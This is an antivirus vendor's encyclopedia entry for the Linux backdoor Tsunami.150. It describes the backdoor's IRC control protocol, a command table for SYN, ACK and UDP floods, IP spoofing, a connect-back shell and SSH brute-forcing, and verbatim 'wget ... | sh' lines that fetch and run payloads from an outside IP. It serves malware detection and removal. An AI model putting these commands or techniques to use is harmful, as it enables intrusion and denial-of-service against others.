Защити созданное

Другие наши ресурсы

  • free.drweb.uz — бесплатные утилиты, плагины, информеры
  • av-desk.com — интернет-сервис для поставщиков услуг Dr.Web AV-Desk
  • curenet.drweb.uz — сетевая лечащая утилита Dr.Web CureNet!
  • www.drweb.uz/web-iq — ВебIQметр
Закрыть

Библиотека
Моя библиотека

Чтобы добавить ресурс в библиотеку, войдите в аккаунт.

+ Добавить в библиотеку

Ресурсов: -

Последний: -

Моя библиотека

Поддержка
Круглосуточная поддержка | Правила обращения

Позвоните

Бесплатно по России:
8-800-333-79-32

ЧаВо | Форум

Ваши запросы

  • Все: -
  • Незакрытые: -
  • Последний: -

Позвоните

Бесплатно по России:
8-800-333-79-32

Свяжитесь с нами Незакрытые запросы: 

Профиль

Профиль

Linux.BackDoor.Tsunami.150

Добавлен в вирусную базу Dr.Web: 2015-07-23

Описание добавлено:

SHA1:

  • 3a99f7816c6864fd36ceea3380e591d337b0b241 (unpacked)
  • 691704fb9de3e1d4a6c5b84b99be71ef375257a8 (packed)

Backdoor for Linux OSes that gets installed on the system by Linux.PNScan.1. It uses "/var/run/.boss.pid" as a lock file.

To connect to the IRC server, the Trojan generates the name and nickname string as follows:

m64|dog|root|%c%c%c%c%c%c%c%c%c

where %c indicates a random number from the "0123456789" set.

If connection attempt is successful, the malicious program sends the following commands to the server:

NICK <nick>\n
USER x00 localhost localhost :dogscan\n

where <nick> indicates a nickname generated as described above.

While establishing a connection to the IRC server, the malicious program waits for incoming commands. The backdoor can execute the following commands:

CommandActionComments
352Set a fake IP
376Join the channelSend(fd, "MODE %s -xi\n", nick);
Send(fd, "MODE %s +B\n", nick);
Send(fd, "JOIN %s :%s\n", chan, pass);
433Generate a new nickname
ERRORGenerate a new nickname
422Join the channelSend(fd, "MODE %s -xi\n", nick);
Send(fd, "MODE %s +B\n", nick);
Send(fd, "JOIN %s :%s\n", chan, pass);
NICKTake a string from the command as a nickname
PINGSend PONG
PRIVMSGExecute a special command

Moreover, the Trojan can execute a number of extended commands.

CommandActionSyntax
RANDOMFLOODRandomly switch between ACK and SYN FloodRANDOMFLOOD <target> <port> <secs>
NSACKFLOODACK FloodNSACKFLOOD <target> <port> <secs>
NSSYNFLOODSYN FloodNSSYNFLOOD <target> <port> <secs>
ACKFLOODACK Flood (spoofed)
SYNFLOODSYN Flood (spoofed)SYNFLOOD <target> <port> <secs>
UDPUDP FloodUDP <target> <port> <secs>
UNKNOWNLaunch a DDoS attackUNKNOWN <target> <secs>
SERVERChange the server to the one specified in the command
GETSPOOFSGet spoofing parameters
SPOOFSSet an IP or an IP range for spoofingSPOOFS <iprange/ip>
GETDownload a specified fileGET <url> <save as>
VERSIONReturn backdoor's version
KILLALLTerminate a DDoS attack
HELPDisplay the list of available commands
CBACKConnect backCBACK <ip> <port> connectback shell
SCANRNDBrute-force SSH credentials (random IP addresses are chosen from an IP range, and a standard dictionary is used)SCANRND <192 or 192.168 or 192.168.0> <threads> <minutes>
SCANRND2Brute-force SSH credentials (random IP addresses are chosen from an IP range, and a dictionary specified in the incoming parameters is used)SCANRND2 <192 or 192.168 or 192.168.0> <threads> <minutes> <user> <passwd>
SCANSUBBrute-force SSH credentials (the Trojan goes through all IP addresses from an IP range using a standard dictionary)SCANSUB <192.168> <threads>
SCANSUB2Brute-force SSH credentials (the Trojan goes through all IP addresses from an IP range using a dictionary specified in the incoming parameters)SCANSUB2 <192.168> <threads> <user> <passwd>
DOGRNDBrute-force SSH credentials (random IP addresses are chosen from an IP range, and a standard dictionary is used)DOGRND <192 or 192.168 or 192.168.0> <threads> <minutes>
DOGSUBBrute-force SSH credentials (the Trojan goes through all IP addresses from an IP range using a standard dictionary)DOGSUB <192.168> <threads>
IRCSend specified IRC commands to the serverIRC <arg1> <arg2> <arg...>
SHExecute a set of SH commandsSH <arg1> <arg2> <arg...>

Once the login:password combination is found, SCANRND, SCANRND2, SCANSUB, SCANSUB2 execute the following command on the remote system:

wget -qO - http://104.199.135.124/bbsh | sh > /dev/null 2>↦1

or

wget -qO - http://104.199.135.124/wgsh | sh > /dev/null 2>↦1 

Downloaded scripts install Linux.BackDoor.Tsunami.144 on the system.

Once the login:password combination is found, DOGRND, DOGSUB execute the following command:

uname -a || echo - 

After that, the "##scaninfo##" user receives the following information in the IRC chat:

[g+] <login>@<ip> | <password> | <os> \n

Рекомендации по лечению


Linux

На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.

Демо бесплатно

На 1 месяц (без регистрации) или 3 месяца (с регистрацией и скидкой на продление)

Скачать Dr.Web

По серийному номеру